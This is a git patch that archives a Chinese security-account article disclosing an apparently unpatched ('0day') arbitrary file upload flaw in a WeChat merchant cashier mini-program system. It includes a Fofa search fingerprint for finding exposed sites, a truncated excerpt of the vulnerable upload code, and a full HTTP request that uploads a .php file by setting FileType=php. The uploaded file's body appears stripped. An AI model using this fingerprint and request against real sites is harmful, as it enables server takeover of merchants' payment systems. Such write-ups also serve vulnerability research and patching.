From 23920dfe7a75d109813f6641b8cc4f4c61aaf9fe Mon Sep 17 00:00:00 2001 From: test Date: Sat, 16 Nov 2024 13:11:00 +0000 Subject: [PATCH] =?UTF-8?q?(0day)=E5=BE=AE=E4=BF=A1=E5=85=AC=E4=BC=97?= =?UTF-8?q?=E5=8F=B7=E5=95=86=E5=AE=B6=E6=94=B6=E9=93=B6=E5=8F=B0=E5=B0=8F?= =?UTF-8?q?=E7=A8=8B=E5=BA=8F=E7=B3=BB=E7=BB=9F=E5=AD=98=E5=9C=A8=E5=89=8D?= =?UTF-8?q?=E5=8F=B0=E4=BB=BB=E6=84=8F=E6=96=87=E4=BB=B6=E4=B8=8A=E4=BC=A0?= =?UTF-8?q?=E6=BC=8F=E6=B4=9E=E3=80=81?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- bin/wechatmp2markdown-v1.1.9_linux_amd64 | Bin data.json | 3 +- ...商家收银台小程序系统存在前台任意文件上传漏洞.md | 148 ++++++++++++++++++ 3 files changed, 150 insertions(+), 1 deletion(-) mode change 100644 => 100755 bin/wechatmp2markdown-v1.1.9_linux_amd64 create mode 100644 doc/(0day)微信公众号商家收银台小程序系统存在前台任意文件上传漏洞.md diff --git a/bin/wechatmp2markdown-v1.1.9_linux_amd64 b/bin/wechatmp2markdown-v1.1.9_linux_amd64 old mode 100644 new mode 100755 diff --git a/data.json b/data.json index 2cbdc6bf..77944d1d 100644 --- a/data.json +++ b/data.json @@ -33,5 +33,6 @@ "https://mp.weixin.qq.com/s?__biz=MzA5MzE5MDAzOA==&mid=2664229682&idx=4&sn=4f4906e3ee86b96a4d323bf891efdae0&chksm=8b59e9cbbc2e60dda8a2633578ff2e76d88a3a00e52dba1a54ee0b2b9f554066431871d24cd8&scene=58&subscene=0": "CNNVD ∣ 关于微软多个安全漏洞的通报", "https://mp.weixin.qq.com/s?__biz=Mzg4NTY0MDg1Mg==&mid=2247485595&idx=1&sn=b4c87d04e1659f11fad8f2f125985751&chksm=cfa49360f8d31a76e5d3880e51cd8f9b0ab1df47e86729adf04ea6d1f1202fac72fae5903fbe&scene=58&subscene=0": "大语言语言模型安全攻击以及AI供应链漏洞", "https://mp.weixin.qq.com/s?__biz=MzI2NTg4OTc5Nw==&mid=2247521498&idx=1&sn=f0af27f6b0e814c92846ea129bcee155&chksm=ea94a5b0dde32ca62dddf91f42a9fa2b36402ffb856469973f83a6a88e24d6910dcc53072ef4&scene=58&subscene=0": "PostgreSQL 高危漏洞可导致环境变量被利用", - "https://mp.weixin.qq.com/s?__biz=MzIwNDA2NDk5OQ==&mid=2651388483&idx=1&sn=070fb6976ee52108d263858115ea9bfd&chksm=8d398bcbba4e02ddbe0183f79c2682bbf1cab54e4ba6bb0697fdc56e297e7303aa9eb938b9e6&scene=58&subscene=0": "2024年网络安全漏洞研究人才培养交流活动成功举办" + "https://mp.weixin.qq.com/s?__biz=MzIwNDA2NDk5OQ==&mid=2651388483&idx=1&sn=070fb6976ee52108d263858115ea9bfd&chksm=8d398bcbba4e02ddbe0183f79c2682bbf1cab54e4ba6bb0697fdc56e297e7303aa9eb938b9e6&scene=58&subscene=0": "2024年网络安全漏洞研究人才培养交流活动成功举办", + "https://mp.weixin.qq.com/s/O2Ohp_ceYrTo8hppX09fkw": "(0day)微信公众号商家收银台小程序系统存在前台任意文件上传漏洞" } \ No newline at end of file diff --git a/doc/(0day)微信公众号商家收银台小程序系统存在前台任意文件上传漏洞.md b/doc/(0day)微信公众号商家收银台小程序系统存在前台任意文件上传漏洞.md new file mode 100644 index 00000000..ddd5b69c --- /dev/null +++ b/doc/(0day)微信公众号商家收银台小程序系统存在前台任意文件上传漏洞.md @@ -0,0 +1,148 @@ +# (0day)微信公众号商家收银台小程序系统存在前台任意文件上传漏洞 +原创 Mstir 星悦安全 2024-11-15 04:00 + +![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/lSQtsngIibibSOeF8DNKNAC3a6kgvhmWqvoQdibCCk028HCpd5q1pEeFjIhicyia0IcY7f2G9fpqaUm6ATDQuZZ05yw/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "") + +点击上方 +蓝字关注我们 并设为 +星标 +## 0x00 前言 + +**微信公众号程序,必须微信认证服务号,微信支付商家** + +**客户扫码,打开商家定义支付页面,输入金额和对应定义信息,提交微信支付,实现快速付款** + +**支持创建多个店铺,各个店铺自定义不同自定义表单。通过自定义表单实现订单自定义明细** + +**通过店铺自定义表单可以轻松建立,快捷收款、微信收银台、面对面收款、商品预约预订等扫码微信支付, 提升客户服务体验,商户快速获得精准订单数据,实现账款统计。** + +**通过打开自定义的表单页面,输入自定义的指定信息,可以实现订单收款。** + +**完全可自定义的表单字段,支持单行文本,多行文本,单选,多选,下拉选择,上传图片,时间。** + +**Fofa指纹:"/index.php?s=platform/index/captcha"** + +![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/uicic8KPZnD5fr0w5NqA8l0xH4mcpTbkGK0szDic8fhdBYZG6TibVicicgIetibblicY29d5RRAfgXiaP2SZeibYxFmaLjcg/640?wx_fmt=other&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "") +![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/uicic8KPZnD5fr0w5NqA8l0xH4mcpTbkGKJhib0QiasRZUpQ803gWXKKuWxFIvGzWAUibb2By0ykNnmwiboKzZBtXictQ/640?wx_fmt=other&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "") +![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/uicic8KPZnD5fr0w5NqA8l0xH4mcpTbkGK5Mrao8VJcOicQAy2ybNHz1KMP9Vws3vOic4gpuCaQI9LPEBoOKHY409g/640?wx_fmt=other&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "") +## 0x01 漏洞分析&复现 + +**位于 /library/deep/upload.iframe.php 文件中存在move_uploaded_file 函数上传文件,且过滤文件类型可通过GET传入FileType来自定义,导致漏洞产生.** +``` + 0) + { + echo "Error: " . $_FILES["uploadFileName"]["error"] . "
"; + }else{ + + if( stripos( $FileType, get_file_extension($_FILES["uploadFileName"]["name"] ) )!==false ){ + $upload_file_name=upload_file_savename($_FILES["uploadFileName"]["name"],$saveName); + move_uploaded_file($_FILES["uploadFileName"]["tmp_name"], '../../data/uploadfile/'.$savePath .'/'.$upload_file_name);//保存被上传的文件 + echo 'ok '; + echo "上传成功,文件地址:".'data/uploadfile/'.$savePath.'/'.$upload_file_name."

"; + ?> + + +``` + +**Payload:** +``` +POST /library/deep/upload.iframe.php?action=add&MaxSize=&FileType=php&savePath=&backIdName=&saveName=0 HTTP/1.1 +Host: 127.0.0.1 +Content-Length: 208 +Upgrade-Insecure-Requests: 1 +Origin: http://127.0.0.1 +Content-Type: multipart/form-data; boundary=----WebKitFormBoundarywb0ftWeTnkfnoTM2 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: close + +------WebKitFormBoundarywb0ftWeTnkfnoTM2 +Content-Disposition: form-data; name="uploadFileName"; filename="666.php" +Content-Type: image/png + + +------WebKitFormBoundarywb0ftWeTnkfnoTM2-- +``` + +![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/uicic8KPZnD5fZ0ljsjVWWlfO36ic1fT8ibV9b0IO28nDoZ59zJEpOQTibUBoWBCV444rYicknxqzKW5yWUKDI7YvxPQ/640?wx_fmt=other&from=appmsg "") +![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/uicic8KPZnD5fZ0ljsjVWWlfO36ic1fT8ibVrTciagdcT0TO3Oob7OqwllGa1B2ia3CVTR91aLXHNegNT9YgR9QwMVEw/640?wx_fmt=other&from=appmsg "") +## 0x02 源码下载 + +**标签:代码审计,0day,渗透测试,系统,通用,0day,闲鱼,转转** + +**收银台源码关注公众号发送 241114 获取!** + + + + +**进星悦安全公开群添加下方VX 备注 "进群"** + +![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/uicic8KPZnD5fr0w5NqA8l0xH4mcpTbkGK5v6wyHcicibH4ia14Wq1n0fPvn1C0QPAe98oVABtMWOA8nRPfHia0YqAFw/640?wx_fmt=other&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "") + +**免责声明:****文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,文章作者和本公众号不承担任何法律及连带责任,望周知!!!** +